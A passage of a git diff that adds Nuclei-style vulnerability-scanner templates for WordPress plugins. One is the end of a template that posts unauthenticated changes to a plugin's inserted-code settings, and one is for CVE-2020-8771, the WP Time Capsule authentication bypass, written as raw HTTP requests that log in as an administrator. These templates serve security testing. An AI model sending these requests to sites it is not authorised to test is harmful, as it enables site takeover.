authorized user, thus allowing any unauthenticated user to successfully update the inserted code." + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" + + body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' + headers: + Content-Type: application/x-www-form-urlencoded + + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-8771-5339.yaml b/poc/cve/CVE-2020-8771-5339.yaml new file mode 100644 index 0000000000..9c85185f0d --- /dev/null +++ b/poc/cve/CVE-2020-8771-5339.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-8771 + +info: + name: WordPress WP Time Capsule Authentication Bypass + author: princechaddha + severity: critical + reference: https://github.com/SECFORCE/WPTimeCapsulePOC + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + IWP_JSON_PREFIX + + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '